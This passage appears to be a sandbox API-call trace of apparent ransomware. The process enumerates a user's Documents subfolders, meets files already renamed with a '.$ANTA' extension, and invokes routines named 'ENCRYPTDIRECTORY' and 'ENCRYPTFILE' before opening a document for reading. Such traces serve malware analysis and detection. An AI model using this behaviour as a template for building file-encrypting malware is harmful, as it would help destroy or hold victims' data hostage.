0x43e2a20 [0082.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0082.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0082.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0082.501] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc475666, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfc475666, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfc4e7dd8, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x7f10, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="bbYe6GX.rtf.$ANTA", cAlternateFileName="BBYE6G~1.$AN")) returned 1 [0082.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0082.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0082.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0082.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0082.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0082.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0082.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0082.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0082.501] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0082.502] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0082.502] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.502] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0082.502] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc79689a, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfc79689a, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfcab7a45, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0xa3a0, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="E_f7p3czO1Cdd9o.xls.$ANTA", cAlternateFileName="E_F7P3~1.$AN")) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.502] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.502] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0082.503] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0082.503] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.503] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcbc2a34, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfcbc2a34, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfcc6ed65, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x17660, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="HGH4Uw7jgwUTEi7Vo_.ppt.$ANTA", cAlternateFileName="HGH4UW~1.$AN")) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.503] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.503] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0082.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0082.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0082.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0082.504] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcd8c573, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfcd8c573, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfcf0d1f8, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x16ef0, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="hhInqxZ8uBmIDhBj07.csv.$ANTA", cAlternateFileName="HHINQX~1.$AN")) returned 1 [0082.504] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcfa2759, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfcfa2759, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfd0875b7, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x6290, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="lWEK-JelBvY6EHJ.xlsx.$ANTA", cAlternateFileName="LWEK-J~1.$AN")) returned 1 [0082.504] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd120004, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfd120004, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfd194401, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0xadc0, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="rar_tJIXYd14cWJz.odp.$ANTA", cAlternateFileName="RAR_TJ~1.$AN")) returned 1 [0082.504] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd22ae47, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfd22ae47, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfd2773dc, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x8740, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="Zjnf2x96GL5i.rtf.$ANTA", cAlternateFileName="ZJNF2X~1.$AN")) returned 1 [0082.504] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2940, ftCreationTime.dwHighDateTime=0x144e8e8, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2940, ftLastWriteTime.dwLowDateTime=0x43ea2e0, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="", cAlternateFileName="ﶈмńဓ+\x10")) returned 0 [0082.504] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0082.504] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|-HpKoiMRyoVVCXApKjWd", cchCount1=21, lpString2="", cchCount2=0) returned 3 [0082.504] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0082.504] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0082.504] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd")) returned 0x10 [0082.504] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\*", lpFindFileData=0x144e348 | out: lpFindFileData=0x144e348*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5be40c0, ftCreationTime.dwHighDateTime=0x1d5eb3b, ftLastAccessTime.dwLowDateTime=0x20013d30, ftLastAccessTime.dwHighDateTime=0x1d5f036, ftLastWriteTime.dwLowDateTime=0x20013d30, ftLastWriteTime.dwHighDateTime=0x1d5f036, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43cb228, cFileName=".", cAlternateFileName="")) returned 0x41ac6c0 [0082.505] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144e348 | out: lpFindFileData=0x144e348*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5be40c0, ftCreationTime.dwHighDateTime=0x1d5eb3b, ftLastAccessTime.dwLowDateTime=0x20013d30, ftLastAccessTime.dwHighDateTime=0x1d5f036, ftLastWriteTime.dwLowDateTime=0x20013d30, ftLastWriteTime.dwHighDateTime=0x1d5f036, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43cb228, cFileName="..", cAlternateFileName="")) returned 1 [0082.505] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144e348 | out: lpFindFileData=0x144e348*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ac7bf90, ftCreationTime.dwHighDateTime=0x1d5ece1, ftLastAccessTime.dwLowDateTime=0x9abd5c50, ftLastAccessTime.dwHighDateTime=0x1d5e624, ftLastWriteTime.dwLowDateTime=0x9abd5c50, ftLastWriteTime.dwHighDateTime=0x1d5e624, nFileSizeHigh=0x0, nFileSizeLow=0x5570, dwReserved0=0x0, dwReserved1=0x43cb228, cFileName="bVjgYdkDx.odt", cAlternateFileName="BVJGYD~1.ODT")) returned 1 [0082.505] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeefb1990, ftCreationTime.dwHighDateTime=0x1d5f049, ftLastAccessTime.dwLowDateTime=0x2b265b0, ftLastAccessTime.dwHighDateTime=0x1d5ec12, ftLastWriteTime.dwLowDateTime=0x2b265b0, ftLastWriteTime.dwHighDateTime=0x1d5ec12, nFileSizeHigh=0x0, nFileSizeLow=0x157d3, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="F0N0.rtf", cAlternateFileName="")) returned 1 [0082.505] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e55450, ftCreationTime.dwHighDateTime=0x1d5f10a, ftLastAccessTime.dwLowDateTime=0x54035490, ftLastAccessTime.dwHighDateTime=0x1d5e6d3, ftLastWriteTime.dwLowDateTime=0x54035490, ftLastWriteTime.dwHighDateTime=0x1d5e6d3, nFileSizeHigh=0x0, nFileSizeLow=0x16ff1, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="HUjUtG60c TddWcmy.rtf", cAlternateFileName="HUJUTG~1.RTF")) returned 1 [0082.505] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49be8ab0, ftCreationTime.dwHighDateTime=0x1d5ead7, ftLastAccessTime.dwLowDateTime=0xc4079560, ftLastAccessTime.dwHighDateTime=0x1d5e757, ftLastWriteTime.dwLowDateTime=0xc4079560, ftLastWriteTime.dwHighDateTime=0x1d5e757, nFileSizeHigh=0x0, nFileSizeLow=0x10d72, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="kDeOPhXR4D.csv", cAlternateFileName="KDEOPH~1.CSV")) returned 1 [0082.505] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2b95160, ftCreationTime.dwHighDateTime=0x1d5ea67, ftLastAccessTime.dwLowDateTime=0xe909a60, ftLastAccessTime.dwHighDateTime=0x1d5f008, ftLastWriteTime.dwLowDateTime=0xe909a60, ftLastWriteTime.dwHighDateTime=0x1d5f008, nFileSizeHigh=0x0, nFileSizeLow=0x14a89, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="ul2gt2Lt.xlsx", cAlternateFileName="UL2GT2~1.XLS")) returned 1 [0082.505] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd43305b0, ftCreationTime.dwHighDateTime=0x1d5ee22, ftLastAccessTime.dwLowDateTime=0x1c93bf30, ftLastAccessTime.dwHighDateTime=0x1d5ea6c, ftLastWriteTime.dwLowDateTime=0x1c93bf30, ftLastWriteTime.dwHighDateTime=0x1d5ea6c, nFileSizeHigh=0x0, nFileSizeLow=0xb865, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="zSm3MoFqp.odp", cAlternateFileName="ZSM3MO~1.ODP")) returned 1 [0082.505] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2aa0, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0xf, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3580, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ǀнńဓ+\x10")) returned 0 [0082.505] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0082.505] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|bVjgYdkDx.odt|F0N0.rtf|HUjUtG60c TddWcmy.rtf|kDeOPhXR4D.csv|ul2gt2Lt.xlsx|zSm3MoFqp.odp", cchCount1=88, lpString2="", cchCount2=0) returned 3 [0082.505] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0082.505] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\bVjgYdkDx.odt", lpFindFileData=0x144e718 | out: lpFindFileData=0x144e718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ac7bf90, ftCreationTime.dwHighDateTime=0x1d5ece1, ftLastAccessTime.dwLowDateTime=0x9abd5c50, ftLastAccessTime.dwHighDateTime=0x1d5e624, ftLastWriteTime.dwLowDateTime=0x9abd5c50, ftLastWriteTime.dwHighDateTime=0x1d5e624, nFileSizeHigh=0x0, nFileSizeLow=0x5570, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="bVjgYdkDx.odt", cAlternateFileName="BVJGYD~1.ODT")) returned 0x41ac440 [0082.505] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0082.506] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0082.506] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0082.506] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0082.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43c3878, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0082.506] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\bVjgYdkDx.odt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\bvjgydkdx.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0082.506] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0082.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0082.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0082.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0082.507] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0082.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0082.507] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0082.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0082.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 